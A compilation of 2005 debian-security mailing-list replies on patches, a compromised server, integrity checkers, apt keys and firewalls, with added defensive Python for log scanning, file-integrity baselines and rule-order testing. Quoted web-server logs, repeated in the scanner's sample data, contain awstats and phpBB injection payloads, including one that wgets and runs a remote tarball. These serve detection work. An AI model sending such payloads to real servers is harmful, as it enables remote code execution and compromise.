> Any chance of an elaboration? I wasn't privy to any previous discussion on this and I'm interested. What's the problem with searching bugzilla for security patches on given versions, and applying them? Is it the sheer volume?

http://kitenet.net/~joey/blog/entry/bug_hiding_systems-2005-07-30-06-25.html

Summary: Even when new fixed packages are available the original bugs reported in Mozilla's BugZilla system are non-public, as are patches.

Mozilla *appears* to have no interest in supplying patches which *only* fix security holes to distributors. Their line is more "upgrade to the newest version". Whilst the new versions do fix the holes, they traditionally also break things built against them, such as extensions, galeon, etc. Which is why we're seeing the problem now.

Steve
Re: a compromised machine
On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote:
> Since the process runs as www-data some kiddy has abused a web service on your server to download and run an external software. Look for suspicious log lines of your web server.

Yes ..

> Examples of hacks on our servers:
>
> 82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1 200 422 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)
>
> 211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] GET /phpbb/viewtopic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 HTTP/1.0 200 28732 - PHP/4.3.4
>
> It should be rather easy finding signs of weird accesses like %20 or chr(). Also look for weird signs in /tmp.

Both of these attacks could be prevented by the use of mod_security, which I'd recommend you look into using in the future if you have potentially untrusted scripts running.

Steve
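As an added example (not part of the thread, and not a mod_security ruleset), the script below runs the two requests Christoph quoted through the check he describes: decode the request target (repeatedly, so the double-encoded `%2527` in the phpBB probe becomes the quote it turns into inside PHP), look for shell metacharacters, download tools, `chr()` obfuscation and `/tmp` staging, and rebuild the command hidden behind the `chr()` sequence. The sample log is constructed: the first two lines are the quoted requests re-joined into combined log format, the third is a benign request for contrast; the indicator list is an assumption to be tuned per site.

```python
"""Scan web-server access logs for command-injection probes like the
awstats and phpBB requests quoted in the message above."""
import re
from urllib.parse import unquote

# Constructed sample log (combined log format). The first two requests are the
# ones from the message, re-joined onto single lines; the third is benign.
SAMPLE_LOG = r"""
82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET /phpbb/viewtopic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 HTTP/1.0" 200 28732 "-" "PHP/4.3.4"
10.0.0.5 - - [04/Dec/2004:17:44:00 +0100] "GET /phpbb/viewtopic.php?t=27&highlight=debian HTTP/1.0" 200 28732 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Each indicator is checked against the fully decoded request target.
# The list is an assumption for this example, not a vendor ruleset.
INDICATORS = [
    ("shell metachar", re.compile(r"[;|`]|\$\(")),
    ("download tool", re.compile(r"\b(wget|curl|fetch|lynx)\b")),
    ("php code eval", re.compile(r"\b(system|passthru|exec|shell_exec|eval)\s*\(")),
    ("chr() obfuscation", re.compile(r"chr\(\d+\)")),
    ("tmp staging", re.compile(r"/(tmp|var/tmp|dev/shm)\b")),
]

CHR_CALL = re.compile(r"chr\((\d+)\)")


def decode_url(target: str, max_rounds: int = 3) -> str:
    """Undo percent-encoding until it stops changing, so a double-encoded
    %2527 is seen as the quote character it becomes inside PHP."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def decode_chr_sequence(text: str) -> str:
    """Rebuild the string a PHP payload assembles from chr(N) calls."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(text) if int(n) < 256)


def scan(log_text: str) -> list:
    """Return one finding per request whose decoded target trips an indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        decoded = decode_url(m["target"])
        reasons = [name for name, rx in INDICATORS if rx.search(decoded)]
        if reasons:
            findings.append({
                "host": m["host"],
                "when": m["when"],
                "status": m["status"],
                "target": decoded,
                "reasons": reasons,
                "chr_payload": decode_chr_sequence(decoded),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["host"], f["reasons"], f["chr_payload"] or f["target"][:60])
```

Note that the phpBB probe trips none of the shell indicators: the injected code is PHP, and only decoding the `chr()` calls shows that it runs `ls -la /var/www`. A status of 200 on such a line, as in both quoted examples, is the signal that the request was served rather than rejected.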
Re: My machine was hacked - possibly via sshd?
On Wed, Jul 20, 2005 at 10:17:56AM -0700, Brent Bates wrote:
> This morning my machine was also compromised in a similar fashion as described in your post here.
> http://lists.debian.org/debian-security/2005/03/msg00112.html
> Was the point of entry ever determined?

That one seemed to be a fairly obvious weak password which was escalated into a root attack via a local kernel flaw.

> I just happened to log onto my machine while this was taking place. I did a ps and killed everything except non essential processes and mounted a directory tree I had with known good binaries and used those to poke around the machine. I have no idea how they got in, there were a lot of processes running as nobody. I really only run apache as nobody, so that could be the point of entry.

What CGI / PHP / scripts are you running with Apache?

> root 955 1 0 Jan10 ? 00:00:11 /usr/local/apache/bin/httpd

That's not a Debian package.

> root 1471 1 0 Jan10 ? 00:00:00 /usr/local/snmp/sbin/snmpd

Neither is that. If you're going to run non-Debian packages you must keep track of them and make sure they are up to date. Have you done so ..?

> bates 24862 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
> root 16095 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio

Don't recognise either of those.

> nobody 4824 4752 0 06:40 ? 00:00:00 ./ptr3
> nobody 4825 4824 0 06:40 ? 00:00:00 [ptr3 defunct]
> nobody 4826 4824 0 06:40 ? 00:00:00 [ptr3 defunct]

Local kernel exploitation attempts ..?

> root 4920 1 0 06:41 ? 00:00:00 chmod 755 /usr/local/bin/ssh2
> root 4925 4920 0 06:41 ? 00:00:00 [chmod defunct]
> root 4927 1 0 06:41 ? 00:00:00 mv -f sshd /usr/sbin/sshd
> root 4929 1 0 06:41 ? 00:00:00 chown root.bin /usr/sbin/sshd

Trojan installation ..?

> nobody 4967 4964 0 06:42 ? 00:00:00 perl clean 220.228.110.11 2025

IP address of attacker ..?

> nobody 5030 5005 0 06:43 ? 00:00:00 ./traci
> nobody 5031 5030 0 06:43 ? 00:00:00 ./traci
> nobody 5032 5030 0 06:43 ? 00:00:00 [traci defunct]
> root 5033 5030 0 06:43 ? 00:00:00 [modprobe defunct]

Kernel attempt again ..?

Lots of detail there .. but it is a bit hard to understand without more knowledge of what is upon your system, etc. My immediate suggestion would be to disconnect the machine from the network, and proceed from there. If you have a tripwire/aide/checksumming installation in place you can use that to detect binary modifications by booting from known-good media. If not your best option is to try to determine what route the attacker used to get in, make sure you're comfortable you can close it, and then reinstall.

Steve
-- 
# The Debian Security Audit Project. http://www.debian.org/security/audit
Re: Light weight IDSes and then some
On Fri, Jul 15, 2005 at 11:58:26AM -0500, George P Boutwell wrote:
> The Security Debian How-To mentions Tripwire. Looking at AIDE and Tripwire in the debian packages repositories it's hard to tell the difference. I'm sure they both do the job, anyone with experience with both these packages can describe some of the pros and cons of each?

Simple introduction to both aide, and integrit:
http://www.debian-administration.org/articles/49

It doesn't mention tripwire, which is a shame. But I'll try to update it later.

Steve
-- 
# The Debian Security Audit Project. http://www.debian.org/security/audit
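The two messages above (the compromised-machine reply, which recommends a tripwire/aide/checksumming baseline checked from known-good media, and this question about aide versus tripwire) both turn on the same mechanism, so here is one added example of it, written for this page rather than taken from aide, tripwire or integrit. It records a hash plus ownership, mode, size and mtime for every file under a root, stores that database, and later reports what was added, removed or altered. The `demo()` function replays on a throwaway directory the tampering visible in the quoted `ps` output: `sshd` replaced, a new binary dropped, a binary made setuid, one deleted. Paths and contents in the demo are constructed.

```python
"""Minimal file-integrity baseline in the spirit of aide/tripwire/integrit:
record a hash and metadata for every file under a root, store it, and later
report what was added, removed or altered."""
import hashlib
import json
import os
import stat
import tempfile
from pathlib import Path


def file_record(path: Path) -> dict:
    """Metadata and SHA-256 for one path (symlinks recorded by target, not followed)."""
    st = os.lstat(path)
    rec = {"mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid, "gid": st.st_gid,
           "size": st.st_size, "mtime": int(st.st_mtime)}
    if stat.S_ISLNK(st.st_mode):
        rec["target"] = os.readlink(path)
    elif stat.S_ISREG(st.st_mode):
        h = hashlib.sha256()
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(1 << 16), b""):
                h.update(chunk)
        rec["sha256"] = h.hexdigest()
    return rec


def build_baseline(root) -> dict:
    """Map of relative path -> record for every file and symlink under root."""
    root = Path(root)
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            baseline[p.relative_to(root).as_posix()] = file_record(p)
    return baseline


def save_baseline(baseline: dict, dest) -> None:
    """Write the database. Keep the copy you compare against off the host or on
    read-only media: an attacker with root can rewrite anything stored locally."""
    Path(dest).write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(src) -> dict:
    return json.loads(Path(src).read_text())


def compare(baseline: dict, current: dict, ignore=()) -> dict:
    """Diff two baselines; 'changed' lists which attributes differ per path."""
    changed = {}
    for name in baseline.keys() & current.keys():
        keys = (baseline[name].keys() | current[name].keys()) - set(ignore)
        diffs = sorted(k for k in keys if baseline[name].get(k) != current[name].get(k))
        if diffs:
            changed[name] = diffs
    return {"added": sorted(current.keys() - baseline.keys()),
            "removed": sorted(baseline.keys() - current.keys()),
            "changed": changed}


def demo() -> dict:
    """Replay the tampering seen in the thread on a constructed throwaway tree:
    sshd replaced, a new binary dropped, ls made setuid, ps deleted."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in {"sbin/sshd": b"\x7fELF genuine sshd",
                          "bin/ls": b"\x7fELF genuine ls",
                          "bin/ps": b"\x7fELF genuine ps"}.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(body)
        before = build_baseline(root)
        save_baseline(before, root / "baseline.json")   # in real use: copy this off-box
        (root / "sbin/sshd").write_bytes(b"\x7fELF trojaned sshd")
        (root / "bin/ssh2").write_bytes(b"\x7fELF dropped binary")
        os.chmod(root / "bin/ls", 0o4755)
        (root / "bin/ps").unlink()
        after = build_baseline(root)
        after.pop("baseline.json", None)                # the database is not part of the tree
        return compare(load_baseline(root / "baseline.json"), after)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The `ignore` argument exists for attributes you expect to churn (some people ignore `mtime` on log directories); the setuid case in the demo shows why `mode` should never be on that list, since a permission change alone leaves the hash untouched.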
Re: Timeliness of Debian Security Announceness? (DSA 756-1 Squirrelmail)
On Thu, Jul 14, 2005 at 05:40:22PM +0200, Herwig Wittmann wrote:
> This would be very convenient- but the delay that seems to have passed between the original squirrelmail security announcement and the time I received the alert via [EMAIL PROTECTED] is worrying: The Vulnerability seems to have been described a few weeks ago:
> http://www.squirrelmail.org/security/issue/2005-06-15
> The Debian Security Advisory 756-1 is dated July 13th, 2005.

This has been discussed already in the archives, you should probably refer to those rather than reviving the subject. eg the following three threads:

http://lists.debian.org/debian-security/2005/06/msg00055.html
http://lists.debian.org/debian-security/2005/06/msg00097.html
http://lists.debian.org/debian-security/2005/06/msg00142.html

> I do not want to be rude in any way- please try to excuse my way of putting things, but does anybody have a prediction how probable it is for such a thing to happen again?

It's unknown whether the build infrastructure problems will recur, machines do die so it's possible. The communication problems leading to various misunderstandings I hope will be less likely to reoccur.

> Is there a role/function in debian that is responsible for reviewing bugtraq or similar sources, and is ensured that this role is fulfilled every day?

The security team do follow bugtraq, etc. Filing bugs with patches is a useful thing to do - but forwarding a message that has been posted publicly already is perhaps less useful. It's not like there's not enough spam mail sent to [EMAIL PROTECTED] already ;)

> Or will there be other measures in place to see that security issues are noticed quickly for all packages- even for strange tools that are not used by normal unix-centered developers?

I'm unsure exactly what you are suggesting about less popular tools. Sure if five issues need fixing simultaneously the less used is liable to suffer if there's a more important bug. Still even less popular tools are supported, all packages should receive updates eventually.

Steve
-- 
# The Debian Security Audit Project. http://www.debian.org/security/audit
Re: [SECURITY] [DSA 741-1] New bzip2 packages prevent decompression bomb
Hello,

I am on vacation until the 20th of July. You can contact our supportdesk for support questions. Sales questions or other questions can be sent to [EMAIL PROTECTED]

Regards,
Steve Karnadi
Re: gpg-errors with apt
On Thu, Jul 07, 2005 at 12:22:36PM +0200, Johann Spies wrote:
> I have read http://www.debian-administration.org/articles/174 about this topic and have done what the article suggested:
>
> ~# gpg --keyserver keyring.debian.org --recv 4F368D5D
>
> This imports the key for the Debian Unstable archive.
>
> Got a timeout here.

Firewall?

> Or if you wish you can download it from the internet, from http://www.debian.org/releases/ - towards the bottom of the page there's a link to the file ziyi_key_2005.asc. Download this and import it as follows:
>
> [EMAIL PROTECTED]:~# cat ziyi_key_2005.asc | gpg --import

(Bad '' on the end of that command line.. mistake in copy + paste?)

> I have done this but I still get the following on aptitude update (on sid):
>
> W: GPG error: ftp://archive3.sun.ac.za unstable Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F1D53D8C4F368D5D

This is a completely different key - here the complaint is that the archive you have in your apt.sources list, for archive3.sun.ac.za, is signed with a key 'F1D53D8C4F368D5D' which you don't have imported.

> W: GPG error: ftp://archive3.sun.ac.za unstable Release: The following signatures couldn't be verified because the public key is not available:

And the error says as much. The signature isn't verified because you're missing the key.

> NO_PUBKEY 07DC563D1F41B907
> W: You may want to update the package lists to correct these missing files

Find the key that the archive is signed with, import it as you did for the main Sid/Etch archive and all should be well.

> Is this a bug or how do I solve this problem?

Not a bug with the *Debian* archive, but a missing key on your side from the look of things..

Steve
-- 
# The Debian Security Audit Project. http://www.debian.org/security/audit
Re: gpg-errors with apt
On Thu, Jul 07, 2005 at 02:14:51PM +0200, Johann Spies wrote:
> Ok, but the archive on archive3.sun.ac.za is just a mirror from a primary debian upstream source. Do I have to generate a specific key for my server?

Strange .. but no, you need do nothing with your key(s).

> > > NO_PUBKEY 07DC563D1F41B907
> > > W: You may want to update the package lists to correct these missing files
> >
> > Find the key that the archive is signed with, import it as you did for the main Sid/Etch archive and all should be well.
>
> And where do I find this key?

gpg --keyserver some.key.server --recv-keys 07DC563D1F41B907

(For keyservers I use: keyring.debian.org, pgp.mit.edu, pgpkeys.pgp.net, wwwkeys.uk.pgp.net or wwwkeys.pgp.net)

Steve
Re: [SECURITY] [DSA 742-1] New cvs packages fix arbitrary code execution
Hello,

I am on vacation until the 20th of July. You can contact our supportdesk for support questions. Sales questions or other questions can be sent to [EMAIL PROTECTED]

Regards,
Steve Karnadi
Re: Firewall-troubleshooting
On Sat, Jul 02, 2005 at 04:46:29PM -0400, KC wrote:
> I need help understanding what goes wrong in this script. I cannot ping anyone and cannot resolve as well. In fact I believe the only thing I can get is an ip address from my isp's dhcp server.

There's no way I'm going to read through all of that and try to understand it. Perhaps you'd be better off starting with a smaller firewall script and then adding to it as you need?

One thing did stand out though, you don't allow outgoing connections generally. These lines:

iptables --policy OUTPUT DROP
iptables -t nat --policy OUTPUT DROP
iptables -t mangle --policy OUTPUT DROP

They seem to say "no output except that which is explicitly allowed". For a big network I too would restrict outgoing connections, but for a home machine with only trusted hosts? It's an additional complication which doesn't gain you much. (Sure if you had a trojan which phoned home, or tried to compromise other hosts .. it would help. But .. in general it is less useful than it appears).

Steve
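Three messages on this page describe rule-ordering problems that are easy to reason about with a model: the shorewall behaviour where a matching MAC rule ACCEPTs everything and later rules are never consulted, Steve Wray's wish for a "netfilter simulator" to regression-test rule sets, and this OUTPUT-policy-DROP script that can neither ping nor resolve. The block below is an added example, written for this page and not derived from netfilter, shorewall or fwbuilder code: a first-match evaluator over a chain with a default policy, two small rule sets modelled on the cases above (both the problematic and a corrected ordering), and a `regression()` helper that reports every packet whose verdict differs from what the table of expectations says. Addresses, ports and the MAC are constructed.

```python
"""Tiny first-match model of a netfilter-style ruleset, used as the
'netfilter simulator' for regression-testing rule order."""
import ipaddress
from dataclasses import dataclass, field
from typing import Optional


@dataclass(frozen=True)
class Packet:
    chain: str                      # INPUT, OUTPUT or FORWARD
    proto: str                      # tcp, udp or icmp
    src: str
    dst: str
    dport: Optional[int] = None
    src_mac: Optional[str] = None
    state: str = "NEW"              # NEW or ESTABLISHED, as in the conntrack match


def _in_net(addr: str, net: str) -> bool:
    return ipaddress.ip_address(addr) in ipaddress.ip_network(net, strict=False)


@dataclass
class Rule:
    target: str                     # ACCEPT, DROP or REJECT: all terminating here
    proto: Optional[str] = None
    src: Optional[str] = None       # single address or CIDR network
    dst: Optional[str] = None
    dport: Optional[int] = None
    src_mac: Optional[str] = None
    state: Optional[str] = None

    def matches(self, pkt: Packet) -> bool:
        if self.src is not None and not _in_net(pkt.src, self.src):
            return False
        if self.dst is not None and not _in_net(pkt.dst, self.dst):
            return False
        if self.src_mac is not None and (pkt.src_mac or "").lower() != self.src_mac.lower():
            return False
        for name in ("proto", "dport", "state"):
            want = getattr(self, name)
            if want is not None and want != getattr(pkt, name):
                return False
        return True


@dataclass
class Chain:
    policy: str
    rules: list = field(default_factory=list)


def verdict(chains: dict, pkt: Packet) -> str:
    """Walk the chain in order; the first matching rule decides, else the policy."""
    for rule in chains[pkt.chain].rules:
        if rule.matches(pkt):
            return rule.target
    return chains[pkt.chain].policy


def regression(chains: dict, expectations: list) -> list:
    """Every (packet, expected, actual) triple whose verdict is not the expected one."""
    return [(p, want, verdict(chains, p))
            for p, want in expectations if verdict(chains, p) != want]


TRUSTED_MAC = "00:11:22:33:44:55"    # constructed


def mac_accept_ruleset(fixed: bool) -> dict:
    """INPUT chain modelled on the shorewall behaviour described on this page: a MAC
    rule that ACCEPTs everything shadows the later rule meant to drop telnet.
    The fixed variant makes the MAC a condition on each specific ACCEPT instead."""
    if not fixed:
        rules = [Rule("ACCEPT", src_mac=TRUSTED_MAC),
                 Rule("DROP", proto="tcp", dport=23),       # never reached for that MAC
                 Rule("ACCEPT", proto="tcp", dport=22)]
    else:
        rules = [Rule("DROP", proto="tcp", dport=23),
                 Rule("ACCEPT", proto="tcp", dport=22, src_mac=TRUSTED_MAC)]
    return {"INPUT": Chain("DROP", rules)}


def home_output_ruleset(fixed: bool) -> dict:
    """OUTPUT chain with policy DROP as in the script above: with only ESTABLISHED
    traffic allowed, new DNS queries and pings never leave the box.
    The fixed variant explicitly allows DNS and ICMP out."""
    rules = [Rule("ACCEPT", state="ESTABLISHED")]
    if fixed:
        rules += [Rule("ACCEPT", proto="udp", dport=53), Rule("ACCEPT", proto="icmp")]
    return {"OUTPUT": Chain("DROP", rules)}


# Constructed test packets.
TELNET_FROM_TRUSTED = Packet("INPUT", "tcp", "192.168.1.1", "192.168.1.2", 23, TRUSTED_MAC)
DNS_QUERY = Packet("OUTPUT", "udp", "192.168.1.2", "192.168.1.254", 53)
PING = Packet("OUTPUT", "icmp", "192.168.1.2", "192.168.1.254")

if __name__ == "__main__":
    print("telnet from trusted MAC, MAC-first order:", verdict(mac_accept_ruleset(False), TELNET_FROM_TRUSTED))
    print("telnet from trusted MAC, fixed order:    ", verdict(mac_accept_ruleset(True), TELNET_FROM_TRUSTED))
    print("DNS out with OUTPUT DROP, ESTABLISHED only:", verdict(home_output_ruleset(False), DNS_QUERY))
    print("regression failures on fixed home rules:",
          regression(home_output_ruleset(True), [(DNS_QUERY, "ACCEPT"), (PING, "ACCEPT")]))
```

The model deliberately treats every target as terminating and knows nothing about the nat or mangle tables, so it answers ordering questions only; it is a regression harness for the intent of a rule set, not a substitute for testing the generated script on the box.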
Re: Bad press related to (missing) Debian security
On Mon, Jun 27, 2005 at 02:36:12PM -0400, Noah Meyerhans wrote:
> Even allowing uploads from the secretaries could be helpful.

Definitely. I've got fixed packages available right now for some of the bugs which have been raised in this thread, but until somebody can push out the advisories they're just sat around gathering dust.

> Part of the problem with security updates has to do with the fact that it's just difficult to coordinate the work.

That's probably true, and kinda an argument against suddenly adding more members too ...

> The secretary position was originally created to help this situation, but it was never really clear to me what my role was supposed to be.

I admit the role of the position is also a mystery to me, but one that I've not worried too much about. Reviewing patches and building fixed packages is what I've tried to do - whether that is the intended job of a secretary is largely irrelevant. Other jobs like answering mails from people who say "Help my server is hacked" seem more secretarial in nature, so I've tried to answer those as time and details permit.

Steve
-- 
www.steve.org.uk
Re: Bad press related to (missing) Debian security
On Mon, Jun 27, 2005 at 08:39:43PM +0200, Marek Olejniczak wrote:
> I don't understand the philosophy of the Debian security team. Is it really so difficult to push into sarge spamassassin 3.0.4 which is not vulnerable? This version is in Debian testing and why can't this version be pushed into stable?

In some cases fixing a problem, which an upstream will not, or which the package maintainer cannot, is *very* hard work. (eg. Mozilla/ Kernel images).

In this particular case pushing the package itself isn't a hard job - the problem we're currently seeing isn't that the job is hard, but that only a very small number of people have the authority/ability to push the update out.

Steve
Re: getting the MAC address from an ip
On Fri, Jun 24, 2005 at 02:52:40PM +0200, LeVA wrote:
> How can I get a machine's MAC address, if I only know its IP?

If it's on your LAN ping it then look at your arp cache:

[EMAIL PROTECTED]:~$ ping -c 1 192.168.1.1 > /dev/null
[EMAIL PROTECTED]:~$ /usr/sbin/arp 192.168.1.1
Address                  HWtype  HWaddress           Flags Mask            Iface
sun                      ether   08:00:20:C2:1E:F6   C                     eth0

Or if you have a login you can use ifconfig to read it:

[EMAIL PROTECTED]:~$ /sbin/ifconfig | grep HWaddr
eth0      Link encap:Ethernet  HWaddr 00:0A:E6:F6:A3:F4

If it's a remote host then you cannot.

Steve
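The `arp` command above is reading the kernel's neighbour cache, which is also exposed as `/proc/net/arp`. As an added example (not from the thread, and not the arp utility's own code), the script below parses that table and distinguishes the three outcomes a lookup can have: a complete entry, an entry the kernel created when you pinged but that never got an answer (all-zero address, flags 0x0), and no entry at all, which is what you get for a host that is not on a local segment. The sample table is constructed; the flag bit is the ATF_COM value the kernel sets once a hardware address is known.

```python
"""Resolve an IP address to a MAC address from the kernel's ARP cache, the
same table `arp` prints, and tell a missing entry from an incomplete one."""
import sys

ATF_COM = 0x02   # "complete" flag: the hardware address has been learned

# Constructed sample of /proc/net/arp: one resolved neighbour and one the
# host tried to contact but that never answered.
SAMPLE_PROC_NET_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         08:00:20:c2:1e:f6     *        eth0
192.168.1.7      0x1         0x0         00:00:00:00:00:00     *        eth0
"""


def parse_arp_table(text: str) -> dict:
    """Parse /proc/net/arp into {ip: {"mac", "complete", "device"}}."""
    table = {}
    for line in text.splitlines()[1:]:          # first line is the column header
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, _hwtype, flags, mac, _mask, device = fields[:6]
        table[ip] = {
            "mac": mac.upper(),
            "complete": bool(int(flags, 16) & ATF_COM),
            "device": device,
        }
    return table


def lookup_mac(ip: str, table: dict) -> tuple:
    """Return (status, mac). status is 'ok', 'incomplete' (neighbour never replied,
    so the address shown is meaningless) or 'unknown' (no entry: not on a local
    segment, or not contacted yet, so ping it first)."""
    entry = table.get(ip)
    if entry is None:
        return "unknown", None
    if not entry["complete"]:
        return "incomplete", None
    return "ok", entry["mac"]


def live_arp_table() -> dict:
    """Read the real cache on a Linux host."""
    with open("/proc/net/arp") as fh:
        return parse_arp_table(fh.read())


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    table = live_arp_table() if len(sys.argv) > 1 else parse_arp_table(SAMPLE_PROC_NET_ARP)
    print(target, *lookup_mac(target, table))
```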
Re: debian security archive/updates b0rken???
On Sun, Jun 19, 2005 at 12:31:23AM -0400, sean finney wrote:
> please excuse this blatant cross-posting, i wouldn't do it if i didn't think it were critical that i do so...
> http://www.infodrom.org/~joey/log/?200506142140
> say it isn't so!

It isn't so. It's true that the design of sbuild/wanna-build means there were no autobuilders available for stable-security at the moment of sarge's release, but there was already work in progress to fix this by the time that blog entry was posted, and the claim that "it looks like we'll be without security updates for quite a while" caused no small amount of consternation.

TTBOMK, there is now again a full complement of stable-security autobuilders available on 11 archs, and autobuilders for testing-security on 10/11 archs. It doesn't look like the security team has issued any DSAs since then, though they may have done uploads that haven't yet been published (I wouldn't know, not having access to look on klecker).

-- 
Steve Langasek
postmodern programmer
Re: Please allow drupal 4.5.3-1
On Fri, Jun 03, 2005 at 08:19:22AM +0200, Martin Schulze wrote:
> Steve Langasek wrote:
> > On Wed, Jun 01, 2005 at 07:16:00PM -0700, Ian Eure wrote:
> > > On Wednesday 01 June 2005 04:54 pm, Hilko Bengen wrote:
> > > > Just a few hours ago, the Drupal project has released version 4.5.3, a bugfix release which fixes a serious security bug. I have created and just uploaded a 4.5.3-1 package to unstable. Updated Debconf translations are the only additional changes over 4.5.2-3 which is the version in sarge.
> > >
> > > Any reason why you can't just apply the patch to fix that specific bug? And you probably want to be emailing the release team...
> >
> > He did contact the release team; unfortunately, the diff between 4.5.2 and 4.5.3 is rather large and I don't believe it's all security-related, so I think this will have to be left for the security team after all.
>
> Umh, the release team most probably has even stricter rules than the
>          ^^^ security, I guess :)
> release team when it comes to cluttering the diff...

Absolutely -- but the release team has a deadline before which the fix must be in unstable in order for it to be included in sarge (and if everything goes according to plan, this deadline is in 12 hours), whereas you can take as much time as you want to going back and forth with the maintainer until he gets it right. :)

-- 
Steve Langasek
postmodern programmer
Re: Please allow drupal 4.5.3-1
On Wed, Jun 01, 2005 at 07:16:00PM -0700, Ian Eure wrote:
> On Wednesday 01 June 2005 04:54 pm, Hilko Bengen wrote:
> > Just a few hours ago, the Drupal project has released version 4.5.3, a bugfix release which fixes a serious security bug. I have created and just uploaded a 4.5.3-1 package to unstable. Updated Debconf translations are the only additional changes over 4.5.2-3 which is the version in sarge.
>
> Any reason why you can't just apply the patch to fix that specific bug? And you probably want to be emailing the release team...

He did contact the release team; unfortunately, the diff between 4.5.2 and 4.5.3 is rather large and I don't believe it's all security-related, so I think this will have to be left for the security team after all.

Thanks,
-- 
Steve Langasek
postmodern programmer
Re: Security issue with 'elog' package
On Wed, May 04, 2005 at 12:15:15AM +0300, Recai Oktas wrote:
> I uploaded the new upstream of Elog a few days ago (this is a sponsored package). I've just noticed a possible security flaw which affects both versions in testing (2.5.7+r1558) and unstable (2.5.8+r1637), as can be seen in the following CVS log of r1.638:
> http://midas.psi.ch/cgi-bin/cvsweb/elog/src/elogd.c
> Since the fix[1] is so trivial to backport, I can easily prepare a new package for just the version in testing.

Please do so, unless you can point us to a release-critical bug addressed by the version currently in unstable.

Thanks,
-- 
Steve Langasek
postmodern programmer
Re: Apache 1.3.33 (from sarge) and mod_chroot
I've had good luck with nullmailer for just this situation. It's simple and lightweight, works well in chroot.

Steve
-- 
Home Page: http://www.braingia.org/

On Thu, Mar 24, 2005 at 07:31:03AM +0100, Krzysztof Jóźwiak wrote:
> Hello! My web server was hacked a few days ago and I decided to install some new programs and modules which improve security. I found in sarge libapache-mod-chroot which chroots apache (and it works fine) but I can't send mail from php. I installed ssmtp in chroot (I think so) in the chroot environment but it doesn't help :( Does anyone use this module? Perhaps I do something wrong with it or ssmtp...
> --
> Krzysztof Jozwiak
> Debian administrator
Re: Apache 1.3.33 (from sarge) and mod_chroot
On Thu, Mar 24, 2005 at 07:31:03AM +0100, Krzysztof Jóźwiak wrote:
> My web server was hacked a few days ago and I decided to install some new programs and modules which improve security.

Good plan. Did you find the source of the attack? If not you're at risk from a repeat of the previous one ..

> I found in sarge libapache-mod-chroot which chroots apache (and it works fine) but I can't send mail from php. I installed ssmtp in chroot (I think so) in the chroot environment but it doesn't help :(

I can't help you there, but I would suggest you look at mod-security, you can find it in Sarge. The homepage has lots of documentation, and it includes chroot functionality:
http://www.modsecurity.org/

There's a brief introduction here:
http://www.debian-administration.org/?article=65

Steve
Re: Analysis vulnerabilities associated to published security advisories, anyone?
On Wed, Mar 09, 2005 at 12:25:06PM +0100, Javier Fernández-Sanguino Peña wrote:
> Maybe you've seen it already, but the guys at Ubuntu have done a light-weight analysis of the vulnerabilities they have released since Warty was released:
> https://www.ubuntulinux.org/wiki/USNAnalysis

A nice page.

> This analysis does not match the one on ICAT's database (http://icat.nist.gov/icat.cfm?function=statistics) but probably is related to the fact that a lot of tempfile races have been found and reported recently by the Security Audit team.

Yes.

> I would like somebody to do a similar analysis regarding Debian's vulnerabilities (Ubuntu vulns are probably a subset of those affecting woody). Has anyone enough spare time?

I'd be interested in helping out, it seems like it shouldn't take too long to break things down into the type of the vulnerability and local vs. remote.

A simple script I wrote did that for me already - although there are some fixups required as we seem to have a few different spellings for different things. eg. sanitizing vs sanitising. You can see the simple output here along with input and output.

http://people.debian.org/~skx/2005/

I'd be interested in average advisories per week, as well as classification on the actual output. (Seems like buffer overflows are still the biggest reported thing for this year - although you've done a good job at showing temporary file issues).

Steve
-- 
# The Debian Security Audit Project. http://www.debian.org/security/audit
